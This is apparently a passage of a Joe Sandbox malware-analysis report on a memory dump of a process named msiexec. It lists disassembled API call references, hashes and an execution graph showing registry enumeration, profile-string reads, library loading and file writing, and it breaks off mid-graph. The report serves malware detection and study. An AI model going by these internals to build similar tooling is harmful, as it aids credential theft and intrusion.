                                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 726966127-0
                                                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                            APIs
                                                                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 231171946-0
                                                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                            APIs
                                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                                            • free.MSVCRT ref: 0040B0FB
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040B12C
                                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 3669619086-0
                                                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1033339047-0
                                                                                            • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                            • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                            • malloc.MSVCRT ref: 00417407
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                            • free.MSVCRT ref: 00417425
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2605342592-0
                                                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcslen$wcscat$wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 1961120804-0
                                                                                            • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                            • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

Execution Graph

Execution Coverage: 2.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.5%
Total number of Nodes: 762
Total number of Limit Nodes: 20
                                                                                            execution_graph 34006 40fc40 70 API calls 34181 403640 21 API calls 34007 427fa4 42 API calls 34182 412e43 _endthreadex 34183 425115 76 API calls __fprintf_l 34184 43fe40 133 API calls 34010 425115 83 API calls __fprintf_l 34011 401445 memcpy memcpy DialogBoxParamA 34012 440c40 34 API calls 33227 444c4a 33246 444e38 33227->33246 33229 444c56 GetModuleHandleA 33230 444c68 __set_app_type __p__fmode __p__commode 33229->33230 33232 444cfa 33230->33232 33233 444d02 __setusermatherr 33232->33233 33234 444d0e 33232->33234 33233->33234 33247 444e22 _controlfp 33234->33247 33236 444d13 _initterm __getmainargs _initterm 33237 444d6a GetStartupInfoA 33236->33237 33239 444d9e GetModuleHandleA 33237->33239 33248 40cf44 33239->33248 33243 444dcf _cexit 33245 444e04 33243->33245 33244 444dc8 exit 33244->33243 33246->33229 33247->33236 33299 404a99 LoadLibraryA 33248->33299 33250 40cf60 33251 40cf64 33250->33251 33307 410d0e 33250->33307 33251->33243 33251->33244 33253 40cf6f 33311 40ccd7 ??2@YAPAXI 33253->33311 33255 40cf9b 33325 407cbc 33255->33325 33260 40cfc4 33344 409825 memset 33260->33344 33261 40cfd8 33349 4096f4 memset 33261->33349 33266 40d181 ??3@YAXPAX 33268 40d1b3 33266->33268 33269 40d19f DeleteObject 33266->33269 33267 407e30 _strcmpi 33270 40cfee 33267->33270 33373 407948 free free 33268->33373 33269->33268 33272 40cff2 RegDeleteKeyA 33270->33272 33273 40d007 EnumResourceTypesA 33270->33273 33272->33266 33275 40d047 33273->33275 33276 40d02f MessageBoxA 33273->33276 33274 40d1c4 33374 4080d4 free 33274->33374 33278 40d0a0 CoInitialize 33275->33278 33354 40ce70 33275->33354 33276->33266 33371 40cc26 strncat memset RegisterClassA CreateWindowExA 33278->33371 33281 40d1cd 33375 407948 free free 33281->33375 33283 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33372 40c256 PostMessageA 33283->33372 33285 40d061 ??3@YAXPAX 33285->33268 33288 40d084 DeleteObject 33285->33288 
33286 40d09e 33286->33278 33288->33268 33291 40d0f9 GetMessageA 33292 40d17b CoUninitialize 33291->33292 33293 40d10d 33291->33293 33292->33266 33294 40d113 TranslateAccelerator 33293->33294 33296 40d145 IsDialogMessage 33293->33296 33297 40d139 IsDialogMessage 33293->33297 33294->33293 33295 40d16d GetMessageA 33294->33295 33295->33292 33295->33294 33296->33295 33298 40d157 TranslateMessage DispatchMessageA 33296->33298 33297->33295 33297->33296 33298->33295 33300 404ac4 GetProcAddress 33299->33300 33301 404aec 33299->33301 33302 404ad4 33300->33302 33303 404add FreeLibrary 33300->33303 33305 404b13 33301->33305 33306 404afc MessageBoxA 33301->33306 33302->33303 33303->33301 33304 404ae8 33303->33304 33304->33301 33305->33250 33306->33250 33308 410d17 LoadLibraryA 33307->33308 33309 410d3c 33307->33309 33308->33309 33310 410d2b GetProcAddress 33308->33310 33309->33253 33310->33309 33312 40cd08 ??2@YAPAXI 33311->33312 33314 40cd26 33312->33314 33316 40cd2d 33312->33316 33383 404025 6 API calls 33314->33383 33317 40cd66 33316->33317 33318 40cd59 DeleteObject 33316->33318 33376 407088 33317->33376 33318->33317 33320 40cd6b 33379 4019b5 33320->33379 33323 4019b5 strncat 33324 40cdbf _mbscpy 33323->33324 33324->33255 33385 407948 free free 33325->33385 33327 407e04 33386 407a55 33327->33386 33330 407a1f malloc memcpy free free 33332 407cf7 33330->33332 33331 407ddc 33331->33327 33391 407a1f 33331->33391 33332->33327 33332->33330 33332->33331 33334 407d83 33332->33334 33335 407d7a free 33332->33335 33389 40796e 7 API calls 33332->33389 33334->33332 33390 406f30 malloc memcpy free 33334->33390 33335->33332 33340 407e30 33342 407e38 33340->33342 33343 407e57 33340->33343 33341 407e41 _strcmpi 33341->33342 33341->33343 33342->33341 33342->33343 33343->33260 33343->33261 33399 4097ff 33344->33399 33346 409854 33404 409731 33346->33404 33350 4097ff 3 API calls 33349->33350 33351 409723 33350->33351 33424 40966c 33351->33424 33438 4023b2 33354->33438 33360 40ced3 33522 40cdda 
7 API calls 33360->33522 33361 40cece 33364 40cf3f 33361->33364 33475 40c3d0 memset GetModuleFileNameA strrchr 33361->33475 33364->33285 33364->33286 33367 40ceed 33501 40affa 33367->33501 33371->33283 33372->33291 33373->33274 33374->33281 33375->33251 33384 406fc7 memset _mbscpy 33376->33384 33378 40709f CreateFontIndirectA 33378->33320 33380 4019e1 33379->33380 33381 4019c2 strncat 33380->33381 33382 4019e5 memset LoadIconA 33380->33382 33381->33380 33382->33323 33383->33316 33384->33378 33385->33332 33387 407a65 33386->33387 33388 407a5b free 33386->33388 33387->33340 33388->33387 33389->33332 33390->33334 33392 407a38 33391->33392 33393 407a2d free 33391->33393 33398 406f30 malloc memcpy free 33392->33398 33396 407a44 33393->33396 33395 407a43 33395->33396 33397 40796e 7 API calls 33396->33397 33397->33327 33398->33395 33415 406f96 GetModuleFileNameA 33399->33415 33401 409805 strrchr 33402 409814 33401->33402 33403 409817 _mbscat 33401->33403 33402->33403 33403->33346 33416 44b090 33404->33416 33409 40930c 3 API calls 33410 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33409->33410 33411 4097c5 LoadStringA 33410->33411 33412 4097db 33411->33412 33412->33411 33413 4097f3 33412->33413 33423 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33412->33423 33413->33266 33415->33401 33417 40973e _mbscpy _mbscpy 33416->33417 33418 40930c 33417->33418 33419 44b090 33418->33419 33420 409319 memset GetPrivateProfileStringA 33419->33420 33421 409374 33420->33421 33422 409364 WritePrivateProfileStringA 33420->33422 33421->33409 33422->33421 33423->33412 33434 406f81 GetFileAttributesA 33424->33434 33426 409675 33427 4096ee 33426->33427 33428 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33426->33428 33427->33267 33435 409278 GetPrivateProfileStringA 33428->33435 33430 4096c9 33436 409278 GetPrivateProfileStringA 33430->33436 33432 4096da 33437 409278 GetPrivateProfileStringA 33432->33437 33434->33426 33435->33430 33436->33432 33437->33427 
33524 409c1c 33438->33524 33441 401e69 memset 33563 410dbb 33441->33563 33444 401ec2 33587 4070e3 strlen _mbscat _mbscpy _mbscat 33444->33587 33445 401ed4 33576 406f81 GetFileAttributesA 33445->33576 33448 401ee6 strlen strlen 33450 401f15 33448->33450 33451 401f28 33448->33451 33588 4070e3 strlen _mbscat _mbscpy _mbscat 33450->33588 33577 406f81 GetFileAttributesA 33451->33577 33454 401f35 33578 401c31 33454->33578 33457 401f75 33459 402165 33457->33459 33460 401f9c memset 33457->33460 33458 401c31 5 API calls 33458->33457 33462 402195 ExpandEnvironmentStringsA 33459->33462 33463 4021a8 _strcmpi 33459->33463 33589 410b62 RegEnumKeyExA 33460->33589 33595 406f81 GetFileAttributesA 33462->33595 33463->33360 33463->33361 33465 401fd9 atoi 33466 401fef memset memset sprintf 33465->33466 33472 401fc9 33465->33472 33590 410b1e 33466->33590 33469 402076 memset memset strlen strlen 33469->33472 33470 4070e3 strlen _mbscat _mbscpy _mbscat 33470->33472 33471 4020dd strlen strlen 33471->33472 33472->33459 33472->33465 33472->33469 33472->33470 33472->33471 33473 406f81 GetFileAttributesA 33472->33473 33474 402167 _mbscpy 33472->33474 33594 410b62 RegEnumKeyExA 33472->33594 33473->33472 33474->33459 33476 40c422 33475->33476 33477 40c425 _mbscat _mbscpy _mbscpy 33475->33477 33476->33477 33478 40c49d 33477->33478 33479 40c512 33478->33479 33480 40c502 GetWindowPlacement 33478->33480 33481 40c538 33479->33481 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33479->33613 33480->33479 33606 409b31 33481->33606 33485 40ba28 33486 40ba87 33485->33486 33492 40ba3c 33485->33492 33616 406c62 LoadCursorA SetCursor 33486->33616 33488 40ba8c 33617 403c16 33488->33617 33683 404734 33488->33683 33691 404785 33488->33691 33694 4107f1 33488->33694 33489 40ba43 _mbsicmp 33489->33492 33490 40baa0 33491 407e30 _strcmpi 33490->33491 33495 40bab0 33491->33495 33492->33486 33492->33489 33697 40b5e5 10 API calls 33492->33697 33493 40bafa SetCursor 33493->33367 33495->33493 33496 40baf1 
qsort 33495->33496 33496->33493 33990 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33501->33990 33503 40b00e 33504 40b016 33503->33504 33505 40b01f GetStdHandle 33503->33505 33991 406d1a CreateFileA 33504->33991 33507 40b01c 33505->33507 33508 40b035 33507->33508 33509 40b12d 33507->33509 33992 406c62 LoadCursorA SetCursor 33508->33992 33996 406d77 9 API calls 33509->33996 33512 40b136 33523 40c580 28 API calls 33512->33523 33513 40b042 33514 40b087 33513->33514 33520 40b0a1 33513->33520 33993 40a57c strlen WriteFile 33513->33993 33514->33520 33994 40a699 12 API calls 33514->33994 33517 40b0d6 33518 40b116 CloseHandle 33517->33518 33519 40b11f SetCursor 33517->33519 33518->33519 33519->33512 33520->33517 33995 406d77 9 API calls 33520->33995 33522->33361 33523->33364 33536 409a32 33524->33536 33527 409c80 memcpy memcpy 33530 409cda 33527->33530 33528 408db6 12 API calls 33528->33530 33529 409d18 ??2@YAPAXI ??2@YAPAXI 33531 409d54 ??2@YAPAXI 33529->33531 33534 409d8b 33529->33534 33530->33527 33530->33528 33530->33529 33531->33534 33546 409b9c 33534->33546 33535 4023c1 33535->33441 33537 409a44 33536->33537 33538 409a3d ??3@YAXPAX 33536->33538 33539 409a52 33537->33539 33540 409a4b ??3@YAXPAX 33537->33540 33538->33537 33541 409a63 33539->33541 33542 409a5c ??3@YAXPAX 33539->33542 33540->33539 33543 409a83 ??2@YAPAXI ??2@YAPAXI 33541->33543 33544 409a73 ??3@YAXPAX 33541->33544 33545 409a7c ??3@YAXPAX 33541->33545 33542->33541 33543->33527 33544->33545 33545->33543 33547 407a55 free 33546->33547 33548 409ba5 33547->33548 33549 407a55 free 33548->33549 33550 409bad 33549->33550 33551 407a55 free 33550->33551 33552 409bb5 33551->33552 33553 407a55 free 33552->33553 33554 409bbd 33553->33554 33555 407a1f 4 API calls 33554->33555 33556 409bd0 33555->33556 33557 407a1f 4 API calls 33556->33557 33558 409bda 33557->33558 33559 407a1f 4 API calls 33558->33559 33560 409be4 33559->33560 33561 407a1f 4 API calls 33560->33561 33562 409bee 33561->33562 33562->33535 33564 410d0e 2 API 
calls 33563->33564 33565 410dca 33564->33565 33566 410dfd memset 33565->33566 33596 4070ae 33565->33596 33569 410e1d 33566->33569 33570 410e7f _mbscpy 33569->33570 33599 410d3d _mbscpy 33569->33599 33571 401e9e strlen strlen 33570->33571 33571->33444 33571->33445 33573 410e5b 33600 410add RegQueryValueExA 33573->33600 33575 410e73 33575->33570 33576->33448 33577->33454 33579 401c4c 33578->33579 33586 401ca1 33579->33586 33601 410add RegQueryValueExA 33579->33601 33581 401c6a 33582 401c71 strchr 33581->33582 33581->33586 33583 401c85 strchr 33582->33583 33582->33586 33584 401c94 33583->33584 33583->33586 33602 406f06 strlen 33584->33602 33586->33457 33586->33458 33587->33445 33588->33451 33589->33472 33591 410b34 33590->33591 33592 410b4c 33591->33592 33605 410add RegQueryValueExA 33591->33605 33592->33472 33594->33472 33595->33463 33597 4070bd GetVersionExA 33596->33597 33598 4070ce 33596->33598 33597->33598 33598->33566 33598->33571 33599->33573 33600->33575 33601->33581 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33586 33605->33592 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33485 33615 409868 SendMessageA 33611->33615 33613->33481 33614->33609 33615->33610 33616->33488 33618 4107f1 FreeLibrary 33617->33618 33619 403c30 LoadLibraryA 33618->33619 33620 403c74 33619->33620 33621 403c44 GetProcAddress 33619->33621 33623 4107f1 FreeLibrary 33620->33623 33621->33620 33622 403c5e 33621->33622 33622->33620 33627 403c6b 33622->33627 33624 403c7b 33623->33624 33625 404734 3 API calls 33624->33625 33626 403c86 33625->33626 33698 4036e5 33626->33698 33627->33624 33630 4036e5 27 API calls 33631 403c9a 33630->33631 33632 4036e5 27 API calls 33631->33632 33633 403ca4 33632->33633 33634 4036e5 27 API calls 33633->33634 33635 403cae 33634->33635 33710 4085d2 33635->33710 33641 403cd2 33643 403cf7 33641->33643 33862 402bd1 37 API 
calls 33641->33862 33644 403d1c 33643->33644 33863 402bd1 37 API calls 33643->33863 33745 402c5d 33644->33745 33648 4070ae GetVersionExA 33649 403d31 33648->33649 33651 403d61 33649->33651 33864 402b22 42 API calls 33649->33864 33653 403d97 33651->33653 33865 402b22 42 API calls 33651->33865 33654 403dcd 33653->33654 33866 402b22 42 API calls 33653->33866 33757 410808 33654->33757 33658 404785 FreeLibrary 33659 403de8 33658->33659 33761 402fdb 33659->33761 33662 402fdb 29 API calls 33663 403e00 33662->33663 33773 4032b7 33663->33773 33672 403e3b 33674 403e73 33672->33674 33675 403e46 _mbscpy 33672->33675 33820 40fb00 33674->33820 33868 40f334 333 API calls 33675->33868 33684 404785 FreeLibrary 33683->33684 33685 40473b LoadLibraryA 33684->33685 33686 40474c GetProcAddress 33685->33686 33687 40476e 33685->33687 33686->33687 33688 404764 33686->33688 33689 404781 33687->33689 33690 404785 FreeLibrary 33687->33690 33688->33687 33689->33490 33690->33689 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33490 33693->33692 33695 410807 33694->33695 33696 4107fc FreeLibrary 33694->33696 33695->33490 33696->33695 33697->33492 33699 4037c5 33698->33699 33700 4036fb 33698->33700 33699->33630 33869 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33700->33869 33702 40370e 33702->33699 33703 403716 strchr 33702->33703 33703->33699 33704 403730 33703->33704 33870 4021b6 memset 33704->33870 33706 40373f _mbscpy _mbscpy strlen 33707 4037a4 _mbscpy 33706->33707 33708 403789 sprintf 33706->33708 33871 4023e5 16 API calls 33707->33871 33708->33707 33711 4085e2 33710->33711 33872 4082cd 11 API calls 33711->33872 33713 4085ec 33714 403cba 33713->33714 33715 40860b memset 33713->33715 33722 40821d 33714->33722 33874 410b62 RegEnumKeyExA 33715->33874 33717 408637 33717->33714 33718 40865c memset 33717->33718 33876 40848b 10 API calls 33717->33876 33877 410b62 RegEnumKeyExA 33717->33877 33875 410add RegQueryValueExA 33718->33875 33723 40823f 33722->33723 
33724 403cc6 33723->33724 33725 408246 memset 33723->33725 33730 4086e0 33724->33730 33878 410b62 RegEnumKeyExA 33725->33878 33727 40826f 33727->33724 33879 4080ed 11 API calls 33727->33879 33880 410b62 RegEnumKeyExA 33727->33880 33881 4045db 33730->33881 33732 4088ef 33889 404656 33732->33889 33736 408737 wcslen 33736->33732 33742 40876a 33736->33742 33737 40877a wcsncmp 33737->33742 33739 404734 3 API calls 33739->33742 33740 404785 FreeLibrary 33740->33742 33741 408812 memset 33741->33742 33743 40883c memcpy wcschr 33741->33743 33742->33732 33742->33737 33742->33739 33742->33740 33742->33741 33742->33743 33744 4088c3 LocalFree 33742->33744 33892 40466b _mbscpy 33742->33892 33743->33742 33744->33742 33746 402c7a 33745->33746 33747 402d9a 33746->33747 33748 402c87 memset 33746->33748 33747->33648 33893 410b62 RegEnumKeyExA 33748->33893 33750 410b1e RegQueryValueExA 33751 402ce4 memset sprintf 33750->33751 33754 402cb2 33751->33754 33752 402d3a sprintf 33752->33754 33754->33747 33754->33750 33754->33752 33894 402bd1 37 API calls 33754->33894 33895 402bd1 37 API calls 33754->33895 33896 410b62 RegEnumKeyExA 33754->33896 33758 410816 33757->33758 33759 4107f1 FreeLibrary 33758->33759 33760 403ddd 33759->33760 33760->33658 33762 402ff9 33761->33762 33763 403006 memset 33762->33763 33764 403122 33762->33764 33897 410b62 RegEnumKeyExA 33763->33897 33764->33662 33766 410b1e RegQueryValueExA 33767 403058 memset sprintf 33766->33767 33771 403033 33767->33771 33768 4030a2 memset 33898 410b62 RegEnumKeyExA 33768->33898 33771->33764 33771->33766 33771->33768 33772 410b62 RegEnumKeyExA 33771->33772 33899 402db3 24 API calls 33771->33899 33772->33771 33774 4032d5 33773->33774 33775 4033a9 33773->33775 33900 4021b6 memset 33774->33900 33788 4034e4 memset memset 33775->33788 33777 4032e1 33901 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33777->33901 33779 4032ea 33780 4032f8 memset GetPrivateProfileSectionA 33779->33780 33902 4023e5 16 API calls 33779->33902 
33780->33775 33785 40332f 33780->33785 33782 40339b strlen 33782->33775 33782->33785 33784 403350 strchr 33784->33785 33785->33775 33785->33782 33903 4021b6 memset 33785->33903 33904 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33785->33904 33905 4023e5 16 API calls 33785->33905 33789 410b1e RegQueryValueExA 33788->33789 33790 40353f 33789->33790 33791 40357f 33790->33791 33792 403546 _mbscpy 33790->33792 33796 403985 33791->33796 33906 406d55 strlen _mbscat 33792->33906 33794 403565 _mbscat 33907 4033f0 19 API calls 33794->33907 33908 40466b _mbscpy 33796->33908 33800 4039aa 33802 4039ff 33800->33802 33909 40f6e2 33800->33909 33925 40f460 12 API calls 33800->33925 33926 4038e8 21 API calls 33800->33926 33803 404785 FreeLibrary 33802->33803 33804 403a0b 33803->33804 33805 4037ca memset memset 33804->33805 33928 444551 memset 33805->33928 33808 4038e2 33808->33672 33867 40f334 333 API calls 33808->33867 33810 40382e 33811 406f06 2 API calls 33810->33811 33812 403843 33811->33812 33813 406f06 2 API calls 33812->33813 33814 403855 strchr 33813->33814 33815 403884 _mbscpy 33814->33815 33816 403897 strlen 33814->33816 33817 4038bf _mbscpy 33815->33817 33816->33817 33818 4038a4 sprintf 33816->33818 33937 4023e5 16 API calls 33817->33937 33818->33817 33822 40fb10 33820->33822 33821 403e7f 33830 40f96c 33821->33830 33822->33821 33823 40fb55 RegQueryValueExA 33822->33823 33823->33821 33824 40fb84 33823->33824 33825 404734 3 API calls 33824->33825 33826 40fb91 33825->33826 33826->33821 33827 40fc19 LocalFree 33826->33827 33828 40fbdd memcpy memcpy 33826->33828 33827->33821 33941 40f802 7 API calls 33828->33941 33831 4070ae GetVersionExA 33830->33831 33832 40f98d 33831->33832 33833 4045db 7 API calls 33832->33833 33837 40f9a9 33833->33837 33834 40fae6 33835 404656 FreeLibrary 33834->33835 33836 403e85 33835->33836 33842 4442ea memset 33836->33842 33837->33834 33838 40fa13 memset WideCharToMultiByte 33837->33838 33838->33837 33839 40fa43 _strnicmp 33838->33839 
33839->33837 33840 40fa5b WideCharToMultiByte 33839->33840 33840->33837 33841 40fa88 WideCharToMultiByte 33840->33841 33841->33837 33843 410dbb 7 API calls 33842->33843 33844 444329 33843->33844 33942 40759e strlen strlen 33844->33942 33849 410dbb 7 API calls 33850 444350 33849->33850 33851 40759e 3 API calls 33850->33851 33852 44435a 33851->33852 33853 444212 64 API calls 33852->33853 33854 444366 memset memset 33853->33854 33855 410b1e RegQueryValueExA 33854->33855 33856 4443b9 ExpandEnvironmentStringsA strlen 33855->33856 33857 4443f4 _strcmpi 33856->33857 33858 4443e5 33856->33858 33859 403e91 33857->33859 33860 44440c 33857->33860 33858->33857 33859->33490 33861 444212 64 API calls 33860->33861 33861->33859 33862->33643 33863->33644 33864->33651 33865->33653 33866->33654 33867->33672 33868->33674 33869->33702 33870->33706 33871->33699 33873 40841c 33872->33873 33873->33713 33874->33717 33875->33717 33876->33717 33877->33717 33878->33727 33879->33727 33880->33727 33882 404656 FreeLibrary 33881->33882 33883 4045e3 LoadLibraryA 33882->33883 33884 404651 33883->33884 33885 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33883->33885 33884->33732 33884->33736 33886 40463d 33885->33886 33887 404643 33886->33887 33888 404656 FreeLibrary 33886->33888 33887->33884 33888->33884 33890 404666 33889->33890 33891 40465c FreeLibrary 33889->33891 33890->33641 33891->33890 33892->33742 33893->33754 33894->33752 33895->33754 33896->33754 33897->33771 33898->33771 33899->33771 33900->33777 33901->33779 33902->33780 33903->33784 33904->33785 33905->33785 33906->33794 33907->33791 33908->33800 33927 40466b _mbscpy 33909->33927 33911 40f6fa 33912 4045db 7 API calls 33911->33912 33913 40f708 33912->33913 33915 404734 3 API calls 33913->33915 33919 40f7e2 33913->33919 33914 404656 FreeLibrary 33916 40f7f1 33914->33916 33920 40f715 33915->33920 33917 404785 FreeLibrary 33916->33917 33918 40f7fc 33917->33918 33918->33800 33919->33914 33920->33919 33921 
